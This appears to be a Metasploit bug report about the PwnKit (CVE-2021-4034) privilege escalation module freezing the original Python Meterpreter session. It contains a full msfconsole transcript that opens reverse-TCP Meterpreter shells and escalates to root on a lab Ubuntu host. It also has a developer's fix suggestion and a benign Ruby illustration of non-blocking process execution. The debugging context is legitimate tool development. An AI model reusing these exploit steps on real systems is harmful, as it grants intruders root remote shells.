In testing the LPE here (rapid7/metasploit-framework#16312) using a Python payload, the exploit succeeds, but then timeout errors are generated. It appears to fail while crashing the original session.
After turning on debugging and watching, the thing that's happening is that the session freezes after the cmd_exec call. All commands after the cmd_exec fail with timeout errors. If you go back to the original (not root) session, all commands give a timeout error.
If you go into the new root session, it works fine, and if you exit the new root session, then the original session becomes operative again.
Example:
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.101:6578
[*] Sending stage (39920 bytes) to 10.5.132.108
[*] Meterpreter session 1 opened (10.5.135.101:6578 -> 10.5.132.108:46922 ) at 2022-03-08 18:29:21 -0600
msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ubuntu-18041
OS : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lhaqxua
[*] /tmp/.lhaqxua created
[!] Verify cleanup of /tmp/.lhaqxua
[*] Running python3 /tmp/.lhaqxua/.qmnpurhmhd /usr/bin/pkexec /tmp/.lhaqxua/dhuyrf/dhuyrf.so dhuyrf tekeajpcudd
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “tekeajpcudd”
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
[+] The target is vulnerable.
[*] Detected architecture: x86_64
[*] Detected payload arch: x64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.xlkdwwcadpyd
[*] /tmp/.xlkdwwcadpyd created
[*] Writing '/tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.xlkdwwcadpyd
[*] Running python3 /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr /usr/bin/pkexec /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so aagpbnlvb brxphinvsj
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.132.108
[+] Deleted /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so
[+] Deleted /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr
[+] Deleted /tmp/.xlkdwwcadpyd
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.132.108:39786 ) at 2022-03-08 18:30:10 -0600
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/.lhaqxua/.qmnpurhmhd: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) >
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -v
Active sessions
===============
Session ID: 1
Name:
Type: meterpreter linux
Info: msfuser @ ubuntu-18041
Tunnel: 10.5.135.101:6578 -> 10.5.132.108:46922 (10.5.132.108)
Via: exploit/multi/handler
Encrypted: Yes (AES-256-CBC)
UUID: f36f2c5a2e1bd403/python=20/linux=6/2022-03-09T00:29:20Z
CheckIn: 64s ago @ 2022-03-08 18:30:24 -0600
Registered: No
Session ID: 2
Name:
Type: meterpreter linux
Info: root @ 10.5.132.108
Tunnel: 10.5.135.101:4444 -> 10.5.132.108:39786 (10.5.132.108)
Via: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
Encrypted: Yes (AES-256-CBC)
UUID: 59461ffc33ffa15f/x64=2/linux=6/2022-03-09T00:30:10Z
CheckIn: 18s ago @ 2022-03-08 18:31:10 -0600
Registered: No
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 10.5.132.108
OS : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.5.132.108 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: Python exception: FileNotFoundError
meterpreter > cd ~
meterpreter > sysinfo
Computer : ubuntu-18041
OS : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
I haven't replicated this yet, but it resembles an issue Simon and I fixed within shell_to_meterpreter, which also used cmd_exec.
TL;DR: There's now a new Channelize option on cmd_exec to specify that the process should be executed, but not to wait around to buffer the stdout/stderr output back to msfconsole. That might be a solution for this exploit as well 🤞
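Added illustration of the two behaviours the comment above contrasts; this is example code written for this page, not Metasploit's cmd_exec or its Channelize implementation. It assumes one plausible mechanism for the freeze: the command run through cmd_exec exits quickly, but a process it leaves behind inherits the stdout pipe, so a reader that waits for EOF never gets it and sits there until its own timeout fires. The helper names (run_and_wait, run_channelized, peek_channel) and the sample command are constructed for the demonstration.

```ruby
require 'open3'

# Read from io until EOF or until timeout_s seconds have passed.
# Returns [data_read_so_far, :eof] or [data_read_so_far, :timeout].
def drain_until_eof(io, timeout_s)
  buf = +''
  deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout_s
  loop do
    remaining = deadline - Process.clock_gettime(Process::CLOCK_MONOTONIC)
    return [buf, :timeout] if remaining <= 0
    next unless IO.select([io], nil, nil, remaining)
    begin
      buf << io.read_nonblock(4096)
    rescue IO::WaitReadable
      next
    rescue EOFError
      return [buf, :eof]
    end
  end
end

# Blocking pattern (what a "buffer the output back" call does): run the
# command and wait for EOF on its stdout. If the command leaves a background
# child behind, that child inherits the pipe's write end, EOF never arrives
# until it exits, and the caller is stuck until its own timeout fires.
def run_and_wait(cmd, timeout_s: 1.0)
  Open3.popen3(cmd) do |stdin, stdout, _stderr, _wait_thr|
    stdin.close
    drain_until_eof(stdout, timeout_s)
  end
end

# Non-blocking ("channelized") pattern: start the command, keep the read end
# of its output pipe as a channel, and return at once without reading.
def run_channelized(cmd)
  reader, writer = IO.pipe
  pid = Process.spawn(cmd, in: '/dev/null', out: writer, err: writer)
  writer.close          # parent keeps only the read end
  Process.detach(pid)   # reap the direct child in the background
  reader
end

# Read whatever the channel has produced so far, waiting at most wait_s for
# the first bytes, without insisting on EOF. Returns '' if nothing is there.
def peek_channel(chan, wait_s: 0.5)
  return '' unless IO.select([chan], nil, nil, wait_s)
  chan.read_nonblock(4096)
rescue IO::WaitReadable, EOFError
  ''
end

# Constructed sample command: the shell prints one line and exits at once,
# but its backgrounded child keeps the stdout pipe open for a few seconds.
SAMPLE_CMD = 'sleep 3 & echo started'

if __FILE__ == $PROGRAM_NAME
  out, status = run_and_wait(SAMPLE_CMD, timeout_s: 1.0)
  puts "blocking:    got #{out.inspect}, status #{status}"   # status is :timeout
  t0 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  chan = run_channelized(SAMPLE_CMD)
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - t0
  puts "channelized: returned in #{elapsed.round(3)}s, output so far #{peek_channel(chan).inspect}"
end
```

Run with `ruby` on any Unix-like host with `/bin/sh`. The blocking call returns `["started\n", :timeout]` after a full second even though the shell itself exited immediately; the channelized call returns in milliseconds and the same output is still readable from the channel afterwards. The security-relevant lesson for a post-exploitation harness is that a process handed off this way should get its own file descriptors (here `/dev/null` on stdin and a private pipe) rather than inheriting the session's, otherwise one long-lived child can wedge the transport for every subsequent command.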